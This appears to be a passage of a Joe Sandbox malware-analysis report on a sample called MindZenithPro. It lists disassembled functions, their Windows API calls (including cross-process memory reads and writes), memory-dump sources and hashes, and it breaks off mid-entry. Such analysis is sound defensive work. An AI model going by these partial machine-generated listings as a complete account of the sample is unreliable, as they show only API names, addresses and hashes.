                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID:
                                    • API String ID: 3170660625-0
                                    • Opcode ID: 60de520c43a4d404fafcc5bcea680b2dd94ea21a507d9f2c8bd86cb7c3de4393
                                    • Instruction ID: 5c9d99bc8431880c34534034c89a83a75d0ccb5d4fbe34ba71048e5fd189bab5
                                    • Opcode Fuzzy Hash: 60de520c43a4d404fafcc5bcea680b2dd94ea21a507d9f2c8bd86cb7c3de4393
                                    • Instruction Fuzzy Hash: A501F47264171C6BD72377356C49D7B126DAFC17B17210238FB2AD6292EB34CE054165
                                    Function 00420695 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,004205C8,80070057,?,?,?,004209E5), ref: 004206B2
                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004205C8,80070057,?,?), ref: 004206CD
                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004205C8,80070057,?,?), ref: 004206DB
                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004205C8,80070057,?), ref: 004206EB
                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004205C8,80070057,?,?), ref: 004206F7
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                    • String ID:
                                    • API String ID: 3897988419-0
                                    • Opcode ID: 36a37b693bd5f6d44a90e4ee5ed5c7bc48ff6240bd0e8d873a2d51f3460a449a
                                    • Instruction ID: 60bf090d65ab0f305dd985a2a6a07583a8b643953c076a04fb74158dfa989b93
                                    • Opcode Fuzzy Hash: 36a37b693bd5f6d44a90e4ee5ed5c7bc48ff6240bd0e8d873a2d51f3460a449a
                                    • Instruction Fuzzy Hash: BA018F72B00324AFDB205F54EC48B9E7AEDEF84752F140025F906D6212EBB4DD509BA8
                                    Function 0042EFBC Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?), ref: 0042EFD8
                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 0042EFE6
                                    • Sleep.KERNEL32(00000000), ref: 0042EFEE
                                    • QueryPerformanceCounter.KERNEL32(?), ref: 0042EFF8
                                    • Sleep.KERNEL32 ref: 0042F034
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                    • String ID:
                                    • API String ID: 2833360925-0
                                    • Opcode ID: f4836b54e150722cdcffc32f19a66a7ef934b27b0c99424d82789fcf566bc16d
                                    • Instruction ID: 433c158016757767d69c5fd62e528aa958ed0b646a19ce93583434fb4e81696b
                                    • Opcode Fuzzy Hash: f4836b54e150722cdcffc32f19a66a7ef934b27b0c99424d82789fcf566bc16d
                                    • Instruction Fuzzy Hash: 92018031D01629DBCF109FA5ED489DDFB78FF09302F810076E501B2241CB349555C76A
                                    Function 004217DB Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004217F6
                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,0042127D,?,?,?), ref: 00421802
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,0042127D,?,?,?), ref: 00421811
                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,0042127D,?,?,?), ref: 00421818
                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0042182F
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                    • String ID:
                                    • API String ID: 842720411-0
                                    • Opcode ID: 89081ba44f87acb48b82015844dd682030b618b35cd40977b666756c789bac45
                                    • Instruction ID: a556fa5f4acac9cb3dd9f433fd6c7e31947ab9ae9e5bd38fac0923f1664ff137
                                    • Opcode Fuzzy Hash: 89081ba44f87acb48b82015844dd682030b618b35cd40977b666756c789bac45
                                    • Instruction Fuzzy Hash: FE018CB5A00716BFDB215FA4EC48E6B3B6EEF893A1F250465F845C3360DA31DC80CA64
                                    Function 004216F6 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0042170C
                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00421718
                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00421727
                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0042172E
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00421744
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                    • String ID:
                                    • API String ID: 44706859-0
                                    • Opcode ID: f2f7271403d14832786d06d4f5db8ab27726ef4644f7a16626d0b9218ee8e048
                                    • Instruction ID: b9164ea5016b4edcc0ef6fd739d4a27e4e1e98e4f5ae7c65117944a2d920bb76
                                    • Opcode Fuzzy Hash: f2f7271403d14832786d06d4f5db8ab27726ef4644f7a16626d0b9218ee8e048
                                    • Instruction Fuzzy Hash: E9F04979600315ABDB221FA4EC49F5B3BADEFC9762F100425FA45D72A1CA74D840CA64
                                    Function 00421696 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004216AC
                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004216B8
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004216C7
                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004216CE
                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004216E4
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                    • String ID:
                                    • API String ID: 44706859-0
                                    • Opcode ID: 2714a0f26db498901d106960ef37873c9bcbe16babe50e901c0a89c832866400
                                    • Instruction ID: e8cc6d46e93240126c491c49ca9b8db61bffa0c7f6a58d21131dbe6f3280c7b7
                                    • Opcode Fuzzy Hash: 2714a0f26db498901d106960ef37873c9bcbe16babe50e901c0a89c832866400
                                    • Instruction Fuzzy Hash: 6BF0C275200315BBDB211FA4EC4DF5B3B6DEF89761F500421F905D72A2CA30DC40CA64
                                    Function 004309E0 Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                    Download Yara Rule
                                    APIs
                                    • CloseHandle.KERNEL32(?,?,?,?,0043084E,?,00433A6B,?,00000001,00403E59,?), ref: 004309F5
                                    • CloseHandle.KERNEL32(?,?,?,?,0043084E,?,00433A6B,?,00000001,00403E59,?), ref: 00430A02
                                    • CloseHandle.KERNEL32(?,?,?,?,0043084E,?,00433A6B,?,00000001,00403E59,?), ref: 00430A0F
                                    • CloseHandle.KERNEL32(?,?,?,?,0043084E,?,00433A6B,?,00000001,00403E59,?), ref: 00430A1C
                                    • CloseHandle.KERNEL32(?,?,?,?,0043084E,?,00433A6B,?,00000001,00403E59,?), ref: 00430A29
                                    • CloseHandle.KERNEL32(?,?,?,?,0043084E,?,00433A6B,?,00000001,00403E59,?), ref: 00430A36
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    • Opcode ID: cc87fcfc146d81deb1d711c527d5617764cf171dc84640fddc49a4a9e4470f7d
                                    • Instruction ID: bbe7d05754920bab5533eed0b6ae191ef72af4fe79ab14c5825dbbbe3ac25ac1
                                    • Opcode Fuzzy Hash: cc87fcfc146d81deb1d711c527d5617764cf171dc84640fddc49a4a9e4470f7d
                                    • Instruction Fuzzy Hash: 78019071800B159FCB30AF66E890417FAF9BF642157159A3FD19652A21C7B4A984CE84
                                    Function 0042633D Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDlgItem.USER32(?,000003E9), ref: 00426351
                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00426368
                                    • MessageBeep.USER32(00000000), ref: 00426380
                                    • KillTimer.USER32(?,0000040A), ref: 0042639C
                                    • EndDialog.USER32(?,00000001), ref: 004263B6
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                    • String ID:
                                    • API String ID: 3741023627-0
                                    • Opcode ID: 20ef6abd04f72390e26a0f0a81e0939549d81e85541b3c038610719bc9850c95
                                    • Instruction ID: 1aefaea9aa99affd2e7a548ff2581117b60284bc146e3beb6ff33b709ae32a0d
                                    • Opcode Fuzzy Hash: 20ef6abd04f72390e26a0f0a81e0939549d81e85541b3c038610719bc9850c95
                                    • Instruction Fuzzy Hash: C0018630A00314ABEB319B50ED4EB967B78FF14706F41066AB986A10E1D7F4A985CB59
                                    Function 003FDA8B Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 003FDAA3
                                      • Part of subcall function 003F2D18: RtlFreeHeap.NTDLL(00000000,00000000,?,003FDB22,?,00000000,?,00000000,?,003FDB49,?,00000007,?,?,003FDF46,?), ref: 003F2D2E
                                      • Part of subcall function 003F2D18: GetLastError.KERNEL32(?,?,003FDB22,?,00000000,?,00000000,?,003FDB49,?,00000007,?,?,003FDF46,?,?), ref: 003F2D40
                                    • _free.LIBCMT ref: 003FDAB5
                                    • _free.LIBCMT ref: 003FDAC7
                                    • _free.LIBCMT ref: 003FDAD9
                                    • _free.LIBCMT ref: 003FDAEB
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: df864534672d339cdf911cef6acfe453ec24016fbc987cb595e6609a7b08abb5
                                    • Instruction ID: a74f6b39fa5b784a06ce8f202d0fb9edf10bc9eb1750b20664b7993efa9ebaf3
                                    • Opcode Fuzzy Hash: df864534672d339cdf911cef6acfe453ec24016fbc987cb595e6609a7b08abb5
                                    • Instruction Fuzzy Hash: 9CF0187294510DE79A12EB58E485C3B73DEAE047107A50C59F518DB940C734FC404B98
                                    Function 003F2560 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 003F257E
                                      • Part of subcall function 003F2D18: RtlFreeHeap.NTDLL(00000000,00000000,?,003FDB22,?,00000000,?,00000000,?,003FDB49,?,00000007,?,?,003FDF46,?), ref: 003F2D2E
                                      • Part of subcall function 003F2D18: GetLastError.KERNEL32(?,?,003FDB22,?,00000000,?,00000000,?,003FDB49,?,00000007,?,?,003FDF46,?,?), ref: 003F2D40
                                    • _free.LIBCMT ref: 003F2590
                                    • _free.LIBCMT ref: 003F25A3
                                    • _free.LIBCMT ref: 003F25B4
                                    • _free.LIBCMT ref: 003F25C5
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 9cb1ae34905c6088cdeca7c2e41e78bf1bbdd82b3cb9395446834e0271507839
                                    • Instruction ID: addacc7792797577cf0c037191d8459407a1fb51c3b3e6522a1139eb228ac62f
                                    • Opcode Fuzzy Hash: 9cb1ae34905c6088cdeca7c2e41e78bf1bbdd82b3cb9395446834e0271507839
                                    • Instruction Fuzzy Hash: 9EF05E7580222ADBA703BF14BD0186A3B60FB35710B11057BF525EB6B5CB7109019FDC
                                    Function 003D97FB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                    Download Yara Rule
                                    APIs
                                    • EndPath.GDI32(?), ref: 003D980A
                                    • StrokeAndFillPath.GDI32(?,?,00417807,00000000,?,?,?), ref: 003D9826
                                    • SelectObject.GDI32(?,00000000), ref: 003D9839
                                    • DeleteObject.GDI32 ref: 003D984C
                                    • StrokePath.GDI32(?), ref: 003D9867
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                    • String ID:
                                    • API String ID: 2625713937-0
                                    • Opcode ID: 6d416e3f2d69680b2b279c888a2b16484658de842d6e852c1985034b23176372
                                    • Instruction ID: 7333610d6330744879594c232871aea7112cccddf7352bc6bef6b25fc87073f1
                                    • Opcode Fuzzy Hash: 6d416e3f2d69680b2b279c888a2b16484658de842d6e852c1985034b23176372
                                    • Instruction Fuzzy Hash: A2F03C71101B09BBDB266F25EE0C7687F65BB11726F088237E425491F1C7708995EF58
                                    Function 003F1207 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: __freea$_free
                                    • String ID: a/p$am/pm
                                    • API String ID: 3432400110-3206640213
                                    • Opcode ID: 2c63216827b39cf91c2dc29f8c07fd95157f31903b1179dff7ce98d619c1c657
                                    • Instruction ID: 1644a011521be2a3762a031a1cfa97dcf3470c8e775967d8bc28297a32962500
                                    • Opcode Fuzzy Hash: 2c63216827b39cf91c2dc29f8c07fd95157f31903b1179dff7ce98d619c1c657
                                    • Instruction Fuzzy Hash: 4CD1243590020EDACB2A8F68E855BBAB7B4FF56700F2A411AEB05EB651D3758D40CB50
                                    Function 00448305 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003E0592: EnterCriticalSection.KERNEL32(004916FC,?,?,?,003CC0BA,00493560,00492408,00000001,00000000,CMDLINERAW,?,00492408,?,?,?,00000000), ref: 003E059D
                                      • Part of subcall function 003E0592: LeaveCriticalSection.KERNEL32(004916FC,?,?,?,003CC0BA,00493560,00492408,00000001,00000000,CMDLINERAW,?,00492408,?,?,?,00000000), ref: 003E05DA
                                      • Part of subcall function 003CA1D4: _wcslen.LIBCMT ref: 003CA1DE
                                      • Part of subcall function 003E03F3: __onexit.LIBCMT ref: 003E03F9
                                    • __Init_thread_footer.LIBCMT ref: 00448382
                                      • Part of subcall function 003E0548: EnterCriticalSection.KERNEL32(004916FC,?,?,003CC0E8,00493560,00402799,00492408,00000001,00000000,CMDLINERAW,?,00492408,?,?,?,00000000), ref: 003E0552
                                      • Part of subcall function 003E0548: LeaveCriticalSection.KERNEL32(004916FC,?,003CC0E8,00493560,00402799,00492408,00000001,00000000,CMDLINERAW,?,00492408,?,?,?,00000000), ref: 003E0585
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                    • String ID: 5$G$Variable must be of type 'Object'.
                                    • API String ID: 535116098-3733170431
                                    • Opcode ID: cbdfe8bc858fd76000b6f32ba1e5278d1855663e10dad02477c5ae7521c02a5c
                                    • Instruction ID: 1e5ae0095feaeda9724aa1103a691b9cf419ebeaf23274cbd15c4c8a80ad60f9
                                    • Opcode Fuzzy Hash: cbdfe8bc858fd76000b6f32ba1e5278d1855663e10dad02477c5ae7521c02a5c
                                    • Instruction Fuzzy Hash: 53919D74A00209AFDB15EF54D481DAEB7B1FF08304F14845EF905AB392DB79AE41CB59
                                    Function 003F8DB1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 003F8EBE
                                    • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 003F8ECA
                                    • __dosmaperr.LIBCMT ref: 003F8ED1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                    • String ID: ~>
                                    • API String ID: 2434981716-1356106926
                                    • Opcode ID: 404f970f280a28c997811437deba596f41d96d3abccaaf5668531282d44fbcdf
                                    • Instruction ID: 09d159ab6277bafb1caf7428436ef38343ba352746ec407d624432e6396037cc
                                    • Opcode Fuzzy Hash: 404f970f280a28c997811437deba596f41d96d3abccaaf5668531282d44fbcdf
                                    • Instruction Fuzzy Hash: C141A13060414DAFDB2ACF28CC80A7D3FA6DF65344F2585A9FA848B552DF30CC128754
                                    Function 00422DF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0042BB04: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004228B2,?,?,00000034,00000800,?,00000034), ref: 0042BB2E
                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00422E42
                                      • Part of subcall function 0042BACF: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004228E1,?,?,00000800,?,00001073,00000000,?,?), ref: 0042BAF9
                                      • Part of subcall function 0042BA2B: GetWindowThreadProcessId.USER32(?,?), ref: 0042BA56
                                      • Part of subcall function 0042BA2B: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00422876,00000034,?,?,00001004,00000000,00000000), ref: 0042BA66
                                      • Part of subcall function 0042BA2B: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00422876,00000034,?,?,00001004,00000000,00000000), ref: 0042BA7C
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00422EAF
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00422EFC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                    • String ID: @
                                    • API String ID: 4150878124-2766056989
                                    • Opcode ID: 9df2d7644f35514391c9cf1987aca2fae0dbefc26780b0321356f59d07b621a2
                                    • Instruction ID: ba0ae60eccf28167c73b971f798fc0826df4fc9c2f4cb247903a3379a81e4c1e
                                    • Opcode Fuzzy Hash: 9df2d7644f35514391c9cf1987aca2fae0dbefc26780b0321356f59d07b621a2
